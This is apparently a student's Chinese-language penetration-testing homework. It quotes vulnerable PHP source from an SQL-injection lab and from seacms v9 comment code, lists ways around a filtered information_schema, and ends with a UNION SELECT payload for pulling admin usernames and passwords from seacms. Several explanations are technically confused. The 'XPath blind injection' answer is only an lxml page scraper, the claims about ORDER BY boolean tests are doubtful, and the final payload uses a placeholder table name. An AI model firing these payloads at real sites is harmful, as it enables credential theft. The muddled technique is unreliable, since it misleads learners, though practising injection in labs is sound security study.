网络渗透作业

第一题：使用Xpath对Order by 语句进行布尔盲注

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ORDER BY-Error-Numeric</title>
</head><body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00"><?php
include("../sql-connections/sql-connect.php");
$id=$_GET['sort'];	
if(isset($id)){//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'SORT:'.$id."\n");fclose($fp);$sql = "SELECT * FROM users ORDER BY $id";$result = mysql_query($sql);if ($result){?><center><font color= "#00FF00" size="4"><table   border=1'><tr><th>&nbsp;ID&nbsp;</th><th>&nbsp;USERNAME&nbsp;  </th><th>&nbsp;PASSWORD&nbsp;  </th></tr></font></font><?phpwhile ($row = mysql_fetch_assoc($result)){echo '<font color= "#00FF11" size="3">';		echo "<tr>";echo "<td>".$row['id']."</td>";echo "<td>".$row['username']."</td>";echo "<td>".$row['password']."</td>";echo "</tr>";echo "</font>";}	echo "</table>";}else{echo '<font color= "#FFFF00">';print_r(mysql_error());echo "</font>";  }}	else{echo "Please input parameter as SORT with numeric value<br><br><br><br>";echo "<br><br><br>";echo '<img src="../images/Less-46.jpg" /><br>';echo "Lesson Concept and code Idea by <b>D4rk</b>";}
?></font> </div></br></br></br></center> 
</body>
</html>

若要在 XPath 中执行布尔盲注，你首先需要识别网页中的 sort 参数，它通常包含在 URL 中，以下是Python 示例代码，演示如何通过抓取该网页和分析 URL 中的 sort 参数

import requests
from lxml import htmlurl = "http://example.com/your_page.php?sort=1"  # 攻击URL
response = requests.get(url)
tree = html.fromstring(response.text)# 假设你想查看URL中的sort参数
print("URL:", response.url)  # 打印最终请求的URL# 提取网页内容
page_content = tree.xpath('//div[@style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center"]//text()')
print("网页内容:", page_content)

假设 sort 参数直接插入到 ORDER BY 子句中，可尝试不同的值，验证页面内容的变化，例如

sort=1 AND 1=1（总是为真，通常不会改变输出）

sort=1 AND 1=2（总是为假，通常导致页面没有显示任何内容）

第二题：information_schema被过滤了该如何绕过

1. 使用其他数据库表

• mysql数据库：mysql数据库包含一些系统表，可以提供类似的信息。例如，mysql.db、mysql.tables_priv、mysql.columns_priv等。
• performance_schema：如果启用了performance_schema，可以通过它访问某些元数据（如表、列、索引等）。
• sys数据库：如果你的MySQL版本支持sys数据库，它可以提供比information_schema更简化的查询接口。

2. 字典表或文件系统

• 直接读取文件系统上的数据库文件和配置文件。如果数据库服务器的文件系统允许访问某些特定的文件，可能能够直接查看表结构或敏感数据。
• 如果数据库存在数据字典表，它们可能会存储有关数据库结构的其他信息。

3. 使用动态查询

• 动态SQL：某些情况下，你可以利用动态SQL来间接查询系统表。例如，构造存储过程或使用EXECUTE来绕过过滤。

4. 使用漏洞

• 如果过滤是由特定的漏洞引起的，可能会通过利用已知漏洞绕过限制。比如，在SQL注入攻击中，如果能通过特殊字符绕过过滤，就能访问information_schema

第三题：对seacmsv9实现联合查询注入管理员密码

<?php
session_start();
require_once("../../include/common.php");
$id = (isset($gid) && is_numeric($gid)) ? $gid : 0;
$page = (isset($page) && is_numeric($page)) ? $page : 1;
$type = (isset($type) && is_numeric($type)) ? $type : 1;
$pCount = 0;
$jsoncachefile = sea_DATA."/cache/review/$type/$id.js";
//缓存第一页的评论
if($page<2)
{if(file_exists($jsoncachefile)){$json=LoadFile($jsoncachefile);die($json);}
}
$h = ReadData($id,$page);
$rlist = array();
if($page<2)
{createTextFile($h,$jsoncachefile);
}
die($h);	function ReadData($id,$page)
{global $type,$pCount,$rlist;$ret = array("","",$page,0,10,$type,$id);if($id>0){$ret[0] = Readmlist($id,$page,$ret[4]);$ret[3] = $pCount;$x = implode(',',$rlist);if(!empty($x)){$ret[1] = Readrlist($x,1,10000);}}	$readData = FormatJson($ret);return $readData;
}function Readmlist($id,$page,$size)
{global $dsql,$type,$pCount,$rlist;$ml=array();if($id>0){$sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";$rs = $dsql ->GetOne($sqlCount);$pCount = ceil($rs['dd']/$size);$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";$dsql->setQuery($sql);$dsql->Execute('commentmlist');while($row=$dsql->GetArray('commentmlist')){$row['reply'].=ReadReplyID($id,$row['reply'],$rlist);$ml[]="{\"cmid\":".$row['id'].",\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".date("Y/n/j H:i:s",$row['dtime'])."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";}}$readmlist=join($ml,",");return $readmlist;
}function Readrlist($ids,$page,$size)
{global $dsql,$type;$rl=array();$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";$dsql->setQuery($sql);$dsql->Execute('commentrlist');while($row=$dsql->GetArray('commentrlist')){$rl[]="\"".$row['id']."\":{\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".$row['dtime']."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";}$readrlist=join($rl,",");return $readrlist;
}function ReadReplyID($gid,$cmid,&$rlist)
{global $dsql;if($cmid>0){if(!in_array($cmid,$rlist))$rlist[]=$cmid;$row = $dsql->GetOne("SELECT reply FROM sea_comment WHERE id=$cmid limit 0,1");if(is_array($row)){$ReplyID = ",".$row['reply'].ReadReplyID($gid,$row['reply'],$rlist);}else{$ReplyID = "";}}else{$ReplyID = "";}return $ReplyID;
}function FormatJson($json)
{$x = "{\"mlist\":[%0%],\"rlist\":{%1%},\"page\":{\"page\":%2%,\"count\":%3%,\"size\":%4%,\"type\":%5%,\"id\":%6%}}";for($i=6;$i>=0;$i--){$x=str_replace("%".$i."%",$json[$i],$x);}$formatJson = jsonescape($x);return $formatJson;
}function jsonescape($txt)
{$jsonescape=str_replace(chr(13),"",str_replace(chr(10),"",json_decode(str_replace("%u","\u",json_encode("".$txt)))));return $jsonescape;
}

存在漏洞的位置

$sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";

$rs = $dsql->GetOne($sqlCount);

$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";
 

可将$type参数更改为一个恶意的SQL注入，进行联合查询

UNION SELECT null, null, null, null, null, null, null, null, null, username, password FROM admin_table --+